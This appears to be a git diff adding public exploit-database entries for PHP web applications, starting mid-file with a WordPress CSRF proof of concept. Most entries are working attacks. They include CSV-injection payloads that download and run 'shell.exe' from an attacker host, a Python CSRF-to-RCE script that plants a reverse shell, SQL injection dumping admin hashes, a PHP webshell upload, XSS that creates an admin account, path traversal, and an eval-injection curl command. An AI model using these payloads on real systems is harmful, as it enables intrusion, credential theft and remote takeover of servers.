+Share this malicious link to the plugin user. Once he clicks the link, the mime type will automatically get updated. Here I shared a POC to allow exe files(application/x-msdownload) to be uploaded.
+<html>
+<body onload="document.forms[0].submit()">
+<form method="POST" action="http://IP/wp-admin/options-general.php?page=wp-add-mime-types%2Fincludes%2Fadmin.php">
+<input type="hidden" name="mime_type_values" value="exe    =    application/x-msdownload">
+<input type="submit">
+</form>
+</body>
+</html>
\ No newline at end of file
diff --git a/exploits/php/webapps/47303.txt b/exploits/php/webapps/47303.txt
new file mode 100644
index 000000000..3470edb74
--- /dev/null
+++ b/exploits/php/webapps/47303.txt
@@ -0,0 +1,48 @@
+# Exploit Title: Wordpress Plugin Import Export WordPress Users <= 1.3.1 - CSV Injection
+# Exploit Author: Javier Olmedo
+# Contact: @jjavierolmedo
+# Website: https://sidertia.com
+# Date: 2018-08-22
+# Google Dork: inurl:"/wp-content/plugins/users-customers-import-export-for-wp-woocommerce"
+# Vendor: WebToffee
+# Software Link: https://downloads.wordpress.org/plugin/users-customers-import-export-for-wp-woocommerce.1.3.1.zip
+# Affected Version: 1.3.1 and before
+# Active installations: +20,000
+# Patched Version: update to 1.3.2 version
+# Category: Web Application
+# Platform: PHP
+# Tested on: Win10x64
+# CVE: 2019-15092
+# References:
+# https://hackpuntes.com/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection/
+# https://medium.com/bugbountywriteup/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection-b5cc14535787
+ 
+# 1. Technical Description
+# Wordpress Plugin Import Export WordPress Users version 1.3.1. and before are affected by Remote Code
+# Execution through the CSV injection vulnerability. This allows any application user to inject commands
+# as part of the fields of his profile and these commands are executed when a user with greater privilege 
+# exports the data in CSV and opens that file on his machine.
+
+# 2. Vulnerable code
+# The function do_export() from WF_CustomerImpExpCsv_Exporter class does not check if fields beggings
+# with (=, +, -, @) characters so the fields name, surname, alias or display_name are vulnerable to CSV Injection.
+ 
+# 3. Proof Of Concept (PoC)
+# 3.1 Login with subscriber user and change the fields First name, Surname and Alias with payloads.
+# 3.2 Login with a high privileges user and export all users to CSV.
+# 3.3 When the user with high privileges logs in to the application, export data in CSV and opens the 
+# generated file, the command is executed and the shell will run open on the machine.
+
+# 4. Payloads
+=cmd|'/C powershell IEX(wget http://ATTACKER/shell.exe)'!A0
++cmd|'/C powershell IEX(wget http://ATTACKER/shell.exe)'!A0
+-cmd|'/C powershell IEX(wget http://ATTACKER/shell.exe)'!A0
+@cmd|'/C powershell IEX(wget http://ATTACKER/shell.exe)'!A0
+
+# 5. Timeline
+# 15, august 2019 - [RESEARCHER] Discover
+# 15, august 2019 - [RESEARCHER] Report to Webtoffee support
+# 16, august 2019 - [DEVELOPER] More information request
+# 16, august 2019 - [RESEARCHER] Detailed vulnerability report
+# 19, august 2019 - [DEVELOPER] Unrecognized vulnerability
+# 22, august 2019 - [RESEARCHER] Public disclosure
\ No newline at end of file
diff --git a/exploits/php/webapps/47304.txt b/exploits/php/webapps/47304.txt
new file mode 100644
index 000000000..af6848a7a
--- /dev/null
+++ b/exploits/php/webapps/47304.txt
@@ -0,0 +1,27 @@
+# Exploit Title: UserPro <= 4.9.32 Reflected XSS
+# Google Dork: intitle:"Index of" intitle:"UserPro" -uploads
+# Date: 25 August 2019
+# Exploit Author: Damian Ebelties (https://zerodays.lol/)
+# Vendor Homepage: https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681
+# Version: <= 4.9.32
+# Tested on: Ubuntu 18.04.1
+# CVE: CVE-2019-14470
+
+The WordPress plug-in 'UserPro' uses a Instagram library (Instagram PHP API V2 by cosenary) that
+is vulnerable for Reflected Cross-Site Scripting (XSS).
+
+There is more vulnerable code in 'UserPro' core, might release that later.
+
+As of today (25 August 2019) this issue is unfixed.
+
+Vulnerable code: (success.php on line 36)
+
+    if (isset($_GET['error'])) {
+        echo 'An error occurred: ' . $_GET['error_description'];
+    }
+
+    > https://github.com/cosenary/Instagram-PHP-API/blob/master/example/success.php#L36
+
+Proof-of-Concept:
+
+    https://domain.tld/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=<PAYLOAD>
\ No newline at end of file
diff --git a/exploits/php/webapps/47305.py b/exploits/php/webapps/47305.py
new file mode 100755
index 000000000..ec64d4be5
--- /dev/null
+++ b/exploits/php/webapps/47305.py
@@ -0,0 +1,110 @@
+# Exploit Title: openITCOCKPIT 3.6.1-2 - CSRF 2 RCE
+# Google Dork: N/A
+# Date: 26-08-2019
+# Exploit Author: Julian Rittweger
+# Vendor Homepage: https://openitcockpit.io/
+# Software Link: https://github.com/it-novum/openITCOCKPIT/releases/tag/openITCOCKPIT-3.6.1-2
+# Fixed in: 3.7.1 | https://github.com/it-novum/openITCOCKPIT/releases
+# Version: 3.6.1-2
+# Tested on: Debian 9
+# CVE : 2019-10227
+# Exploit Requirements: pip3 install bs4 requests && apt install netcat
+
+#!/usr/bin/env python
+import requests, urllib3, os
+import http.server, socketserver
+
+from bs4 import BeautifulSoup as bs
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+print("""
+--                                                                                        
+  openITCOCKPIT v.3.6.1-2
+  [CSRF 2 RCE]
+--
+""")
+
+# Setup values
+RHOST = input('[x] Enter IP of remote machine: ')
+LHOST = input('[x] Enter IP of local  machine: ')
+RPORT = int(input('[x] Enter local port (back-connection): '))
+LPORT = int(input('[x] Enter local port (payload-hosting): '))
+
+print('[-] Generating CSRF form using the following credentials: "hacked@oicp.app - letmein1337" ..')
+
+# Generate file which serves CSRF payload
+pl = open('./index.html', 'w')
+# Register HTTP server
+handler = http.server.SimpleHTTPRequestHandler
+
+csrf = """
+<iframe style="display:none;" name="csrff"></iframe>
+<form method="post" action="https://""" + RHOST + """/users/add" target="csrff" style="display:none;">
+	<input type="text" name="_method" value="POST">
+	<input type="text" name="data[User][Container][]" value="1">
+	<input type="text" name="data[ContainerUserMembership][1]" value="2">
+	<input type="text" name="data[User][usergroup_id]" value="1">
+	<input type="text" name="data[User][status]" value="1">
+	<input type="text" name="data[User][email]" value="hacked@oicp.app">
+	<input type="text" name="data[User][firstname]" value="Mr">
+	<input type="text" name="data[User][lastname]" value="Nice">
+	<input type="text" name="data[User][new_password]" value="letmein1337">
+	<input type="text" name="data[User][confirm_new_password]" value="letmein1337">
+	<input type="submit">
+</form>
+<script>
+	function Redirect() {  
+        window.location="https://""" + RHOST + """/login/logout"; 
+    } 
+
+	document.forms[0].submit();
+    setTimeout('Redirect()', 3000);   
+</script>
+"""
+
+pl.write(csrf)
+pl.close()
+httpd = socketserver.TCPServer(("", LPORT), handler)
+
+# Start HTTP server, quit on keyboard interrupt
+try:
+	print('[!] Serving payload at port : ' + str(LPORT) + ', press STRG+C if you registered requests!')
+	print('[!] Send this URL to a logged-in administrator: http://' + LHOST + ':' + str(LPORT))
+	httpd.serve_forever()
+except KeyboardInterrupt:
+	httpd.socket.close()
+	print('\n[-] Starting exploitation ..')
+
+print('[-] Logging in ..')
+# Proceed login with generated credentials
+c = requests.post('https://' + RHOST + '/login/login', data={'_method' : 'POST', 'data[LoginUser][username]' : 'hacked@oicp.app', 'data[LoginUser][password]' : 'letmein1337'}, verify=False, allow_redirects=False).headers['Set-Cookie']
+print('[!] Received cookie: ' + c.split(';')[0])
+print('[-] Creating reverse-shell as macro ..')
+# Insert a new macro identified as $USER99$ 
+makro = {'_method' : 'POST', 'data[0][Macro][id]' : 1, 'data[0][Macro][name]' : '$USER1$', 'data[0][Macro][value]' : '/opt/openitc/nagios/libexec', 'data[0][Macro][description]' : 'default', 'data[0][Macro][password]' : 0, 'data[1][Macro][id]' : 2, 'data[1][Macro][name]' : '$USER99$', 'data[1][Macro][value]' : "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"" + LHOST + "\"," + str(RPORT) + "));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'", 'data[1][Macro][password]' : 1}
+requests.post('https://' + RHOST + '/macros', data=makro, verify=False, cookies={'itnovum' : c.split(';')[0].split('=')[1]})
+print('[-] Inserting macro as command ..')
+# Register a new command using the inserted macro
+requests.post('https://' + RHOST + '/commands/add/_controller:commands/_action:hostchecks', data={'_method' : 'POST', 'data[Command][command_type]' : 2, 'data[Command][name]' : 'pwned', 'data[Command][command_line]' : '$USER99$'}, verify=False, cookies={'itnovum' : c.split(';')[0].split('=')[1]})
+h = bs(requests.get('https://' + RHOST + '/commands/hostchecks', verify=False, cookies={'itnovum' : c.split(';')[0].split('=')[1]}).text, 'html.parser')
+ids = []
+
+# Fetch current commands by ID
+for i in h.find_all('form', {'action': lambda x : x.startswith('/commands/delete')}):
+	ids.append(i.get('action').split('/')[-1])
+
+print('[!] ID of command identified as: ' + str(ids[-1]))
+print('[-] Updating default host ..')
+
+# Update host, using the new malicious "hostcheck" command
+sett = {'_method':'POST','data[Host][id]':'1','data[Host][container_id]':'1','data[Host][shared_container]':'','data[Host][hosttemplate_id]':'1','data[Host][name]':'localhost','data[Host][description]':'default+host','data[Host][address]':'127.0.0.1','data[Host][Hostgroup]':'','data[Host][Parenthost]':'','data[Host][notes]':'','data[Host][host_url]':'','data[Host][priority]':'1','data[Host][tags]':'','data[Host][notify_period_id]':'1','data[Host][notification_interval]':'0','data[Host][notification_interval]':'0','data[Host][notify_on_recovery]':'0','data[Host][notify_on_recovery]':'1','data[Host][notify_on_down]':'0','data[Host][notify_on_unreachable]':'0','data[Host][notify_on_unreachable]':'1','data[Host][notify_on_flapping]':'0','data[Host][notify_on_downtime]':'0','data[Host][active_checks_enabled]':'0','data[Host][active_checks_enabled]':'1','data[Host][Contact]':'','data[Host][Contact][]':'1','data[Host][Contactgroup]':'','data[Host][command_id]':ids[-1],'data[Host][check_period_id]':'1','data[Host][max_check_attempts]':'3','data[Host][check_interval]':'120','data[Host][check_interval]':'120','data[Host][retry_interval]':'120','data[Host][retry_interval]':'120','data[Host][flap_detection_enabled]':'0','data[Host][flap_detection_on_up]':'0','data[Host][flap_detection_on_down]':'0', 'data[Host][flap_detection_on_unreachable]' : 0}
+requests.post('https://' + RHOST + '/hosts/edit/1/_controller:hosts/_action:browser/_id:1/', data=sett, verify=False, cookies={'itnovum' : c.split(';')[0].split('=')[1]})
+
+# Refresh host configuration
+print('[-] Refreshing host configuration ..')
+requests.get('https://' + RHOST + '/exports/launchExport/0.json', verify=False, cookies={'itnovum' : c.split(';')[0].split('=')[1]}, headers={'X-Requested-With' : 'XMLHttpRequest'})
+
+print('[!] Done! Enjoy your shell (popup in approx. 30s): ')
+
+# We did it!
+os.system('nc -lvp ' + str(RPORT))
\ No newline at end of file
diff --git a/exploits/php/webapps/47310.txt b/exploits/php/webapps/47310.txt
new file mode 100644
index 000000000..bbbcfd1cf
--- /dev/null
+++ b/exploits/php/webapps/47310.txt
@@ -0,0 +1,79 @@
+<!--
+# Exploit Title: Blind SQL injection in SQLiteManager 1.2.0 (and 1.2.4)
+# Date: 17-02-2019
+# Exploit Author: Rafael Pedrero
+# Vendor Homepage: http://www.sqlitemanager.org/
+# Software Link: http://www.sqlitemanager.org/
+# Version: SQLiteManager 1.2.0 (and 1.2.4)
+# Tested on: All
+# CVE : CVE-2019-9083
+# Category: webapps
+
+
+1. Description
+
+SQLiteManager 1.20 allows SQL injection via the /sqlitemanager/main.php
+dbsel parameter. NOTE: This product is discontinued.
+
+
+2. Proof of Concept
+
+Detect:
+http://localhost/sqlitemanager/main.php?dbsel=-1%20or%2072%20=%2072
+http://localhost/sqlitemanager/main.php?dbsel=-1%20or%2072%20=%2070
+
+Save the next post in a file: sqli.txt
+
+POST /sqlite/main.php?dbsel=-1%20or%2032%20%3d%2030 HTTP/1.1
+Content-Length: 191
+Content-Type: application/x-www-form-urlencoded
+X-Requested-With: XMLHttpRequest
+Cookie: PHPSESSID=s5uogfet0s4nhr81ihgmg5l4v3;
+SQLiteManager_currentTheme=default; SQLiteManager_currentLangue=8;
+SQLiteManager_fullText=0; SQLiteManager_HTMLon=0
+Host: localhost
+Connection: Keep-alive
+Accept-Encoding: gzip,deflate
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64;
+Trident/5.0)
+
+action=save&ColumnList=1&ConditionList=1&trigger=&TriggerAction=FOR%20EACH%20ROW&TriggerCondition=WHEN&TriggerEvent=DELETE&TriggerMoment=BEFORE&TriggerName=kqluvanc&TriggerOn=t1&TriggerStep=1
+
+$ python sqlmap.py -r sqli.txt -p dbsel --level 5 --risk 3 --dump-all
+
+[11:58:27] [INFO] resuming back-end DBMS 'sqlite'
+[11:58:27] [INFO] testing connection to the target URL
+sqlmap resumed the following injection point(s) from stored session:
+---
+Parameter: dbsel (GET)
+    Type: boolean-based blind
+    Title: OR boolean-based blind - WHERE or HAVING clause
+    Payload: dbsel=-4019 OR 7689=7689
+---
+[11:58:27] [INFO] the back-end DBMS is SQLite
+web server operating system: Windows
+web application technology: PHP X.X.X, Apache 2.X.X
+back-end DBMS: SQLite
+[11:58:27] [INFO] sqlmap will dump entries of all tables from all databases
+now
+[11:58:27] [INFO] fetching tables for database: 'SQLite_masterdb'
+[11:58:27] [INFO] fetching number of tables for database 'SQLite_masterdb'
+[11:58:27] [WARNING] reflective value(s) found and filtering out
+[11:58:27] [WARNING] running in a single-thread mode. Please consider usage
+of o
+ption '--threads' for faster data retrieval
+[11:58:27] [INFO] retrieved: 5
+[11:58:27] [INFO] retrieved: database
+[11:58:28] [INFO] retrieved: user_function
+[11:58:30] [INFO] retrieved: attachment
+[11:58:31] [INFO] retrieved: groupes
+[11:58:32] [INFO] retrieved: users
+.....
+.....
+.....
+
+
+3. Solution:
+
+The product is discontinued. Update to last version.
+-->
\ No newline at end of file
diff --git a/exploits/php/webapps/47311.txt b/exploits/php/webapps/47311.txt
new file mode 100644
index 000000000..960f1d6cd
--- /dev/null
+++ b/exploits/php/webapps/47311.txt
@@ -0,0 +1,19 @@
+# Exploit Title: Jobberbase 2.0 CMS - 'jobs-in' SQL Injection
+# Google Dork: N/A
+# Date: 28, August 2019
+# Exploit Author: Suvadip Kar
+# Vendor Homepage:  http://jobberbase.com/
+# Software Link: https://github.com/filipcte/jobberbase/zipball/master
+# Version: 2.0
+# Tested on: Linux
+# CVE : N/A
+
+--------------------------------------------------------------------------------
+
+#POC - SQLi
+#Request: http://localhost/[PATH]/jobs/jobs-in/
+#Vulnerable Parameter: jobs-in (GET)
+#Payload: -4115" UNION ALL SELECT 33,user()-- XYZ
+
+#EXAMPLE: http://localhost/[PATH]/jobs/jobs-in/-4115" UNION ALL SELECT
+33,user()-- XYZ
\ No newline at end of file
diff --git a/exploits/php/webapps/47312.html b/exploits/php/webapps/47312.html
new file mode 100644
index 000000000..d2196b686
--- /dev/null
+++ b/exploits/php/webapps/47312.html
@@ -0,0 +1,37 @@
+<html>
+    <!--
+
+        GoURL Unrestricted Upload Vulnerablity POC by @pouyadarabi      
+        CWE-434
+
+        Vulnerable Fucntion: https://github.com/cryptoapi/Bitcoin-Wordpress-Plugin/blob/8aa17068d7ba31a05f66e0ab2bbb55efb0f60017/gourl.php#L5637
+        
+        Details:
+        
+          After checking file extention substring was used for file name to select first 95 letter line #5655
+          So enter file name like "123456789a123456789b123456789c123456789d123456789e123456789f123456789g123456789h123456789i1.php.jpg"
+          will upload a file with .php extention in website :)
+
+    -->
+
+<body>
+
+    <!--
+
+        Replace http://127.0.0.1/wp/ with target wordpress website
+        Fill id param in form action to any active download product
+
+    -->
+
+    <form action="http://127.0.0.1/wp/?page=gourlfile&id=1" method="POST" enctype="multipart/form-data">
+
+        <input type="file" name="gourlimage2" />
+        <input type="submit"/>
+        
+    </form>
+
+    <a href="http://127.0.0.1/wp/wp-content/uploads/gourl/images/i123456789a123456789b123456789c123456789d123456789e123456789f123456789g123456789h123456789i1.php">Shell link</a>
+
+</body>
+
+</html>
\ No newline at end of file
diff --git a/exploits/php/webapps/47314.sh b/exploits/php/webapps/47314.sh
new file mode 100755
index 000000000..cc9a49692
--- /dev/null
+++ b/exploits/php/webapps/47314.sh
@@ -0,0 +1,41 @@
+#!/bin/bash
+# Exploit Title: Jobberbase 2.0 - 'subscribe' SQL injection
+# Date: 29 August 2019
+# Exploit Author: Damian Ebelties (https://zerodays.lol/)
+# Vendor Homepage: http://www.jobberbase.com/
+# Version: 2.0
+# Tested on: Ubuntu 18.04.1
+
+: '
+
+    The page "/subscribe/" is vulnerable for SQL injection.
+
+    Simply make a POST request to /subscribe/ with the parameters:
+     - email=jobber@zerodays.lol
+     - category=1337<inject_here>
+
+    You can use this script to verify if YOUR OWN instance is vulnerable.
+
+    $ bash verify.sh http://localhost/jobberbase/
+    admin:1a1dc91c907325c69271ddf0c944bc72
+
+'
+
+: 'Fetch the username'
+USERNAME=$(curl -s "$1/subscribe/" \
+                -d "email=jobber@zerodays.lol" \
+                -d "category=-1337 and updatexml(0,concat(0x0a,(select username from admin limit 0,1),0x0a),0)-- -" \
+                -d "zero=days.lol" | head -n 3 | tail -n 1 | sed "s/'' in.*//")
+
+: 'Ugly way to fetch the password hash'
+PASS=$(curl -s "$1/subscribe/" \
+            -d "email=jobber@zerodays.lol" \
+            -d "category=-1337 and updatexml(0,concat(0x0a,(select substring(password,1,16) from admin limit 0,1),0x0a),0)-- -" \
+            -d "zero=days.lol" | head -n 3 | tail -n 1 | sed "s/'' in.*//")
+WORD=$(curl -s "$1/subscribe/" \
+            -d "email=jobber@zerodays.lol" \
+            -d "category=-1337 and updatexml(0,concat(0x0a,(select substring(password,17,16) from admin limit 0,1),0x0a),0)-- -" \
+            -d "zero=days.lol" | head -n 3 | tail -n 1 | sed "s/'' in.*//")
+
+: 'Print the user:hash (note: default login is admin:admin)'
+echo -e "$USERNAME:$PASS$WORD"
\ No newline at end of file
diff --git a/exploits/php/webapps/47315.txt b/exploits/php/webapps/47315.txt
new file mode 100644
index 000000000..7acceb4a8
--- /dev/null
+++ b/exploits/php/webapps/47315.txt
@@ -0,0 +1,19 @@
+# Exploit Title: PilusCart <= 1.4.1 - Local File Disclosure
+# Date: 29 August 2019
+# Exploit Author: Damian Ebelties (https://zerodays.lol/)
+# Vendor Homepage: https://sourceforge.net/projects/pilus/
+# Version: <= 1.4.1
+# Tested on: Ubuntu 18.04.1
+
+The e-commerce software 'PilusCart' is not validating the 'filename' passed correctly,
+which leads to Local File Disclosure.
+
+As of today (29 August 2019) this issue is unfixed.
+
+Vulnerable code: (catalog.php on line 71)
+
+    readfile("$direktori$filename");
+
+Proof-of-Concept:
+
+    https://domain.tld/catalog.php?filename=../../../../../../../../../etc/passwd
\ No newline at end of file
diff --git a/exploits/php/webapps/47323.txt b/exploits/php/webapps/47323.txt
new file mode 100644
index 000000000..091c27aec
--- /dev/null
+++ b/exploits/php/webapps/47323.txt
@@ -0,0 +1,64 @@
+# Exploit Title: Sentrifugo 3.2 - File Upload Restriction Bypass 
+# Google Dork: N/A
+# Date: 8/29/2019
+# Exploit Author: creosote
+# Vendor Homepage: http://www.sentrifugo.com/
+# Version: 3.2
+# Tested on: Ubuntu 18.04
+# CVE : CVE-2019-15813
+
+Multiple File Upload Restriction Bypass vulnerabilities were found in Sentrifugo 3.2. This allows for an authenticated user to potentially obtain RCE via webshell.
+
+File upload bypass locations:
+
+/sentrifugo/index.php/mydetails/documents -- Self Service >> My Details >> Documents (any permissions needed)
+sentrifugo/index.php/policydocuments/add -- Organization >> Policy Documents (higher permissions needed)
+
+
+# POC
+
+1. Self Service >> My Details >> Documents >> add New Document (/sentrifugo/index.php/mydetails/documents)
+2. Turn Burp Intercept On
+3. Select webshell with valid extension - ex: shell.php.doc
+4. Alter request in the upload...
+   Update 'filename' to desired extension. ex: shell.php
+   Change content type to 'application/x-httpd-php'
+
+Example exploitation request:
+
+====================================================================================================
+
+POST /sentrifugo/index.php/employeedocs/uploadsave HTTP/1.1
+Host: 10.42.1.42
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://10.42.1.42/sentrifugo/index.php/mydetails/documents
+X-Requested-With: XMLHttpRequest
+Content-Length: 494
+Content-Type: multipart/form-data; boundary=---------------------------205946976257369239535727507
+Cookie: PHPSESSID=vr0ik0kof2lpg0jlc9gp566qb5
+Connection: close
+
+-----------------------------205946976257369239535727507
+Content-Disposition: form-data; name="myfile"; filename="shell.php"
+Content-Type: application/x-httpd-php
+
+<?php $cmd=$_GET['cmd']; system($cmd);?>
+
+-----------------------------205946976257369239535727507
+Content-Disposition: form-data; name=""
+
+undefined
+-----------------------------205946976257369239535727507
+Content-Disposition: form-data; name=""
+
+undefined
+-----------------------------205946976257369239535727507--
+
+====================================================================================================
+
+5. With intercept still on, Save the document and copy the 'file_new_names' parmeter from the new POST request.
+6. Append above saved parameter and visit your new webshell
+   Ex: http://10.42.1.42/sentrifugo/public/uploads/employeedocs/1565996140_5_shell.php?cmd=cat /etc/passwd
\ No newline at end of file
diff --git a/exploits/php/webapps/47324.txt b/exploits/php/webapps/47324.txt
new file mode 100644
index 000000000..a99a23d17
--- /dev/null
+++ b/exploits/php/webapps/47324.txt
@@ -0,0 +1,62 @@
+# Exploit Title: Sentrifugo 3.2 - Persistent Cross-Site Scripting
+# Google Dork: N/A
+# Date: 8/29/2019
+# Exploit Author: creosote
+# Vendor Homepage: http://www.sentrifugo.com/
+# Version: 3.2
+# Tested on: Ubuntu 18.04
+# CVE : CVE-2019-15814
+
+
+Multiple Stored XSS vulnerabilities were found in Sentrifugo 3.2. In most test cases session riding was also possible by utilizing the XSS vulnerability. This potentially allows for full account takeover.
+
+/sentrifugo/index.php/employee/edit/id/5  <--Attacker employee ID here. POC example pertains to this one.
+/sentrifugo/index.php/feedforwardquestions/add
+/sentrifugo/index.php/announcements/add
+
+# Proof of Concept
+
+A low privileged user can insert a stored XSS referencing a crafted js file that would ride a session of an admin user to create an additional admin user. Logged in as the low priv user, insert the following in "Certificate Description" (Self Service >> My Details >> Training and Certificate Details)
+
+<script src="http://Attacker-IP/add-admin-user.js"></script>
+
+Add the following 'add-admin-user.js' file hosted on your attacking machine. This request will need to be customized per instance of Sentrifugo.
+
+A few crafting notes:
+
+- 'employeeId' - this can be found in the users profile.
+- 'employeeNumId' - this can be an arbitrary number as long as it does not exist.
+- 'emprole' - in this test case '2_1' was the Administrator role
+- 'emp_status_id' - based off  "Contractor", "Full-Time", etc. Contractor is '6' in this case.
+- 'emailaddress' - by default the initial password is sent via email, so this will need to be valid in order to login.
+
+----------------------------------------------------------------------------------------------------
+
+function execute()
+{
+  var nuri ="http://10.42.1.42/sentrifugo/index.php/employee/add";
+  xhttp = new XMLHttpRequest();
+  xhttp.open("POST", nuri, true);
+  xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
+  xhttp.withCredentials = "true";
+  var body = "";
+  body += "\r\n\r\n";
+  body += 
+	"id=&final_emp_id=EMPP99&tmp_emp_name=Select+Candidate&employeeId=EMPP&employeeNumId=99" +
+	"&firstname=Bob&lastname=Blah&modeofentry=Direct&emprole=2_1&emailaddress=bob%40localhost.com" +
+	"&businessunit_id=0&reporting_manager=2&emp_status_id=6&screenflag=add&date_of_joining=07%2F04%2F2019&submit=Save";
+  xhttp.send(body);
+  return true;
+}
+
+execute();
+
+----------------------------------------------------------------------------------------------------
+
+When a user with permissions to add users (HR role by default) views your XSS "Certification Description" the add user request should be sent.
+
+Other session riding request that can possibly be crafted:
+- Company Announcement - gets blasted out to all users. Also has an additional XSS vuln in the description.
+- Add Employee Leave - this one is tricky to craft due to needed parameter knowledge.
+- Background check - update or add employee background check status.
+- Disciplinary Actions - manipulate existent or non-existent disciplinary records.
\ No newline at end of file
diff --git a/exploits/php/webapps/47325.txt b/exploits/php/webapps/47325.txt
new file mode 100644
index 000000000..54bd600f3
--- /dev/null
+++ b/exploits/php/webapps/47325.txt
@@ -0,0 +1,19 @@
+# Exploit Title: DomainMod <= 4.13 - Cross-Site Scripting
+# Date: 30 August 2019
+# Exploit Author: Damian Ebelties (https://zerodays.lol/)
+# Vendor Homepage: https://domainmod.org/
+# Version: <= 4.13
+# Tested on: Ubuntu 18.04.1
+# CVE: CVE-2019-15811
+
+The software 'DomainMOD' is vulnerable for Cross-Site Scripting in the
+file '/reporting/domains/cost-by-month.php' in the parameter 'daterange'.
+
+As of today (30 August 2019) this issue is unfixed.
+
+Almost all other files that use the parameter 'daterange' are vulnerable.
+See: https://github.com/domainmod/domainmod/tree/master/reporting/domains
+
+Proof-of-Concept:
+
+    https://domain.tld/reporting/domains/cost-by-month.php?daterange=%22onfocus=%22alert(1)%22autofocus=%22
\ No newline at end of file
diff --git a/exploits/php/webapps/47326.txt b/exploits/php/webapps/47326.txt
new file mode 100644
index 000000000..57ab65715
--- /dev/null
+++ b/exploits/php/webapps/47326.txt
@@ -0,0 +1,23 @@
+# Exploit Title: YouPHPTube <= 7.4 - Remote Code Execution
+# Google Dork: intext:"Powered by YouPHPTube"
+# Date: 29 August 2019
+# Exploit Author: Damian Ebelties (https://zerodays.lol/)
+# Vendor Homepage: https://www.youphptube.com/
+# Version: <= 7.4
+# Tested on: Ubuntu 18.04.1
+
+YouPHPTube before 7.5 does no checks at all if you wanna generate a new
+config file. We can use this to generate our own config file with our
+own (malicious) code.
+
+All you need is a MySQL server that allows remote connections.
+
+Fixed by the following commit:
+
+    https://github.com/YouPHPTube/YouPHPTube/commit/b32b410c9191c3c5db888514c29d7921f124d883
+
+Proof-of-Concept:
+
+    # Run this command (with your own data replaced)
+    # Then visit https://domain.tld/?zerodayslol=phpinfo() for code execution!
+    curl -s "https://domain.tld/install/checkConfiguration.php" --data "contactEmail=rce@zerodays.lol&createTables=2&mainLanguage=RCE&salt=';eval(\$_REQUEST['zerodayslol']);echo '&systemAdminPass=zerodays.LOL&systemRootPath=./&webSiteRootURL=<URL>&webSiteTitle=Zerodays.lol&databaseHost=<DB_HOST>&databaseName=<DB_NAME>&databasePass=<DB_PASS>&databasePort=<DB_PORT>&databaseUser=<DB_USER>"
\ No newline at end of file
diff --git a/exploits/php/webapps/47327.txt b/exploits/php/webapps/47327.txt
new file mode 100644
index 000000000..683008d6f
--- /dev/null
+++ b/exploits/php/webapps/47327.txt
@@ -0,0 +1,17 @@
+# Exploit Title: WordPress Plugin WooCommerce Product Feed <= 2.2.18 - Cross-Site Scripting
+# Date: 30 August 2019
+# Exploit Author: Damian Ebelties (https://zerodays.lol/)
+# Vendor Homepage: https://wordpress.org/plugins/webappick-product-feed-for-woocommerce/
+# Version: <= 2.2.18
+# Tested on: Ubuntu 18.04.1
+# CVE: CVE-2019-1010124
+
+The WordPress plugin 'WooCommerce Product Feed' does not correctly sanitize user-input,
+which leads to Cross-Site Scripting in the Admin Panel.
+
+Since it is WordPress, it's fairly easy to get RCE with this XSS, by editing the theme
+files via (for example) XHR requests with included Javascript.
+
+Proof-of-Concept:
+
+    https://domain.tld/wp-admin/admin.php?page=woo_feed_manage_feed&link=%3E%3Cscript%3Ealert`zerodays.lol`;%3C/script%3E
\ No newline at end of file
diff --git a/exploits/php/webapps/47331.txt b/exploits/php/webapps/47331.txt
new file mode 100644
index 000000000..2f94c2ae0
--- /dev/null
+++ b/exploits/php/webapps/47331.txt
@@ -0,0 +1,24 @@
+# Exploit Title: Opencart 3.x.x Authenticated Stored XSS
+# Date: 08/15/2019
+# Exploit Author: Nipun Somani
+# Author Web: http://thehackerstore.net
+# Vendor Homepage: https://www.opencart.com/
+# Software Link: https://github.com/opencart/opencart
+# Version: 3.x.x
+# Tested on: Debian 9, Windows 10 x64
+# CVE : CVE-2019-15081
+
+
+Description:
+The Opencart Version 3.x.x allows editing Source/HTML of the Categories /
+Product / Information pages in the admin panel which isn't sanitized to
+user input allowing for an attacker to execute arbitrary javascript code
+leading to Stored Cross-Site-Scripting(XSS).
+
+Proof-of-Concept(POC):
+
+1. Log-in to admin-panel.
+2. Navigate to Catlog and then select any of [Categories or Products or Information] options and and pick any entry or create one.
+3. Under description click on Source option and insert your XSS payload.
+i.e: "><script>alert("XSS")</script>
+4. Now visit the modified page of your public website. And your injected XSS payload will execute.
\ No newline at end of file
diff --git a/exploits/php/webapps/47335.txt b/exploits/php/webapps/47335.txt
new file mode 100644
index 000000000..12c554f08
--- /dev/null
+++ b/exploits/php/webapps/47335.txt
@@ -0,0 +1,33 @@
+# Exploit Title: WordPress Plugin Event Tickets >= 4.10.7.1 - CSV Injection
+# Google Dork: inurl:"\wp-content\plugins\event-tickets"
+# Date: 09-01-2019
+# Exploit Author: MTK (http://mtk911.cf/)
+# Vendor Homepage: https://tri.be/
+# Software Link: https://downloads.wordpress.org/plugin/event-tickets.4.10.7.1.zip
+# Version: Up to v4.107.1
+# Tested on: Apache2/WordPress 5.2.2 - Firefox/Windows
+
+# Software description:
+Event Tickets provides a simple way for visitors to RSVP or purchase tickets to your events. As a standalone plugin, it enables you to add RSVPs or tickets to posts or pages. When paired with The Events Calendar, you can add that same functionality directly to your event listings.
+
+# Technical Details & Impact:
+It's possible to run malicious command on logged in user computer. Even though an alert message is shown on opening the file but users usually ignore such pop-ups since file is from known source.
+
+# POC
+
+1. 	Visit RSVP ticket enabled page
+2.	In Full name section add payload for CSV injection e.g.
+=cmd|'/C ping -t 127.0.0.1'!A0
+3.	Login into WordPress and visit event details in All Post> Ticketed > Attendees. 
+4.	Export Attendees list (.csv format).
+5.	Opening the file will execute malicious payload (command) on user system
+
+
+# Timeline
+02-08-2019 - Vulnerability discovered
